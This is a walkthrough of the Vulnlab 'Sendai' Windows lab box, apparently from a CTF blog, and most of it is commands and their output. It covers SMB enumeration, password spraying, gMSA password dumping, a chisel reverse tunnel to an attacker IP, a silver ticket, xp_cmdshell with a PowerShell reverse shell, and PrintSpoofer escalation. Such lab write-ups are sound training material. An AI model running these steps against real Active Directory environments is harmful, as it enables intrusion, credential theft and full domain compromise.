VL - Sendai
Sendai is a medium rated Windows box created by XCT, this box was orignally used as a hiring challenge with multiple paths to exploit this box. In this post I will shortly show one of the paths available and would encourage you to take a look at the other paths yourself!
Enumeration
We start with some enumeration to see what is on the box:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-14 18:08:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after: 2024-07-10T09:24:23
|_ssl-date: TLS randomness does not represent time
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Not valid before: 2023-07-18T12:39:21
|_Not valid after: 2024-07-18T00:00:00
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after: 2024-07-10T09:24:23
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after: 2024-07-10T09:24:23
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after: 2024-07-10T09:24:23
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-03-14T18:10:15+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=dc.sendai.vl
| Not valid before: 2024-03-13T18:02:06
|_Not valid after: 2024-09-12T18:02:06
| rdp-ntlm-info:
| Target_Name: SENDAI
| NetBIOS_Domain_Name: SENDAI
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sendai.vl
| DNS_Computer_Name: dc.sendai.vl
| DNS_Tree_Name: sendai.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-03-14T18:09:35+00:00
With SMB open we can try listing the share to see if any is open for unauthenticated users:
1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ smbclient -L //<IP>
Password for [WORKGROUP\bushidosan]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
config Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
sendai Disk company share -- Open
SYSVOL Disk Logon server share
Users Disk -- Open
In the sendai share there is a txt file stating that during a pentest weak passwords were discovered and that they got reset and should be changed ASAP. With this in mind we can start bruteforcing RIDs to get more usernames with the Guest account that is enabled.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
└─$ netexec smb <IP> -u 'Guest' -p '' --shares --rid-brute
SMB 10.10.86.230 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.86.230 445 DC [+] sendai.vl\Guest:
SMB 10.10.86.230 445 DC [*] Enumerated shares
SMB 10.10.86.230 445 DC Share Permissions Remark
SMB 10.10.86.230 445 DC ----- ----------- ------
SMB 10.10.86.230 445 DC ADMIN$ Remote Admin
SMB 10.10.86.230 445 DC C$ Default share
SMB 10.10.86.230 445 DC config
SMB 10.10.86.230 445 DC IPC$ READ Remote IPC
SMB 10.10.86.230 445 DC NETLOGON Logon server share
SMB 10.10.86.230 445 DC sendai READ company share
SMB 10.10.86.230 445 DC SYSVOL Logon server share
SMB 10.10.86.230 445 DC Users READ
SMB 10.10.86.230 445 DC 498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.86.230 445 DC 500: SENDAI\Administrator (SidTypeUser)
SMB 10.10.86.230 445 DC 501: SENDAI\Guest (SidTypeUser)
SMB 10.10.86.230 445 DC 502: SENDAI\krbtgt (SidTypeUser)
SMB 10.10.86.230 445 DC 512: SENDAI\Domain Admins (SidTypeGroup)
SMB 10.10.86.230 445 DC 513: SENDAI\Domain Users (SidTypeGroup)
SMB 10.10.86.230 445 DC 514: SENDAI\Domain Guests (SidTypeGroup)
SMB 10.10.86.230 445 DC 515: SENDAI\Domain Computers (SidTypeGroup)
SMB 10.10.86.230 445 DC 516: SENDAI\Domain Controllers (SidTypeGroup)
SMB 10.10.86.230 445 DC 517: SENDAI\Cert Publishers (SidTypeAlias)
SMB 10.10.86.230 445 DC 518: SENDAI\Schema Admins (SidTypeGroup)
SMB 10.10.86.230 445 DC 519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB 10.10.86.230 445 DC 520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.86.230 445 DC 521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.86.230 445 DC 522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.86.230 445 DC 525: SENDAI\Protected Users (SidTypeGroup)
SMB 10.10.86.230 445 DC 526: SENDAI\Key Admins (SidTypeGroup)
SMB 10.10.86.230 445 DC 527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.86.230 445 DC 553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.86.230 445 DC 571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.86.230 445 DC 572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.86.230 445 DC 1000: SENDAI\DC$ (SidTypeUser)
SMB 10.10.86.230 445 DC 1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB 10.10.86.230 445 DC 1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.86.230 445 DC 1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB 10.10.86.230 445 DC 1104: SENDAI\sqlsvc (SidTypeUser)
SMB 10.10.86.230 445 DC 1105: SENDAI\websvc (SidTypeUser)
SMB 10.10.86.230 445 DC 1107: SENDAI\staff (SidTypeGroup)
SMB 10.10.86.230 445 DC 1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB 10.10.86.230 445 DC 1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB 10.10.86.230 445 DC 1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB 10.10.86.230 445 DC 1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB 10.10.86.230 445 DC 1112: SENDAI\Susan.Harper (SidTypeUser)
SMB 10.10.86.230 445 DC 1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB 10.10.86.230 445 DC 1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB 10.10.86.230 445 DC 1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB 10.10.86.230 445 DC 1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB 10.10.86.230 445 DC 1117: SENDAI\Jason.Brady (SidTypeUser)
SMB 10.10.86.230 445 DC 1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB 10.10.86.230 445 DC 1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB 10.10.86.230 445 DC 1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB 10.10.86.230 445 DC 1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB 10.10.86.230 445 DC 1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB 10.10.86.230 445 DC 1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB 10.10.86.230 445 DC 1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB 10.10.86.230 445 DC 1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB 10.10.86.230 445 DC 1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB 10.10.86.230 445 DC 1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB 10.10.86.230 445 DC 1128: SENDAI\ca-operators (SidTypeGroup)
SMB 10.10.86.230 445 DC 1129: SENDAI\admsvc (SidTypeGroup)
SMB 10.10.86.230 445 DC 1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB 10.10.86.230 445 DC 1131: SENDAI\support (SidTypeGroup)
By making a list of these users and trying common password patterns like [company][year] or [season][year] we managed to get the password for Susan.Harper:
1
SMB 10.10.86.230 445 DC [-] sendai.vl\Susan.Harper:[redacted] STATUS_PASSWORD_MUST_CHANGE
Getting access to mgtsvc$
We can reset the password of Susan with smbpasswd:
1
smbpasswd -U susan.harper -r sendai.vl
With valid credentials we can run bloodhound-python to gather some more information about the environment:
1
bloodhound-python -d sendai.vl -c All -dc dc.sendai.vl -ns <IP> -u susan.harper -p <password> --zip
After importing the information in Bloodhound and selecting the shortest path to DA we see the following path:
- We have a GenericAll on ADMSVC@sendai.vl
- ADMSVC@sendai.vl can read the GMSAPassword of MGTSVC$
We can exploit this by first adding ourself to the group admsvc:
1
pth-net rpc group addmem "admsvc" susan.harper -U sendai.vl/susan.harper -S <IP>
Now we are member of this group we can dump the NTLM hash of mgtsvc$:
1
python3 gMSADumper.py -u 'susan.harper' -p '<password>' -d sendai.vl
With this we can use Evil-WinRM or any WinRM tool of your likings to get a shell on the target:
1
evil-winrm -i <ip> -u 'mgtsvc$' -H [redacted]
Moving to sqlsvc
On the C drive there is a folder with a file named .sqlconfig which contains the password for the sqlsvc user. We can use this to create a ntlm hash and make a silver ticket out of it Silver Tickets Explained, but first we have to make a socks proxy connection with Chisle
On the target:
1
chisel.exe client <AttackerIP>:8001 R:1080:socks
On attacker system:
1
chisel server -p 8001 --reverse
We can now use ticketer to create a ticket for us and import it
1
2
ticketer.py -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash [REDACTED] -dc-ip dc.sendai.vl Administrator -domain sendai.vl
export KRB5CCNAME=Administrator.ccache
With this ticket and the proxy connection we can use mssqclient to access the database:
1
proxychains mssqlclient.py dc.sendai.vl -k
Since we are the database administrator we can enable xp_cmd to get command execution as the sqlsvc user:
1
2
3
4
sp_configure 'show advanced options', '1'
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC master..xp_cmdshell 'whoami'
From here there are tons of different ways to get a shell, I used a simple powershell reverse shell from revshells.com:
1
EXEC master..xp_cmdshell 'powershell -e <encoded blob>'
Escalating to SYSTEM
Since we are the sqlsvc account we usually have impersonate privileges, we can confirm this with:
1
whoami /priv
There are multiple ways to get to system from here like Printspoofer or Sweetpotato, I used Printspoofer:
1
./spoof.exe -i -c "powershell -e <encoded blob>
This post is licensed under CC BY 4.0 by the author.